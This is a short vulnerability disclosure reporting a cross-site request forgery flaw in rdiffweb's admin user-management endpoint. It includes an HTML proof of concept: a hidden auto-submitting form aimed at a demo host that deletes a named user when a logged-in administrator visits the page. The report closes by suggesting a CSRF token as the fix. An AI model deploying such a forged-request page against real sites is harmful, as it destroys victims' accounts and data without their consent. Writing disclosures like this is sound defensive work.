Cross-Site Request Forgery (CSRF) in ikus060/rdiffweb
Sep 11th 2021
Hello dear Rdiffweb team.
I found a CSRF vulnerability on following endpoint that attackers able to Delete users with PoC.html
🕵️♂️ Proof of Concept
user with right privileges should be logged in Firefox or Safari.
Users go to a website that contain PoC.html
3.after visiting attacker's website a user with username
aaaa will be deleted.
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://rdiffweb-demo.ikus-soft.com/admin/users" method="POST"> <input type="hidden" name="action" value="delete" /> <input type="hidden" name="username" value="aaaa" /> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
Also attacker can send multiple request with help of Iframes.
I just want to suggest you to set a CSRF token for this form.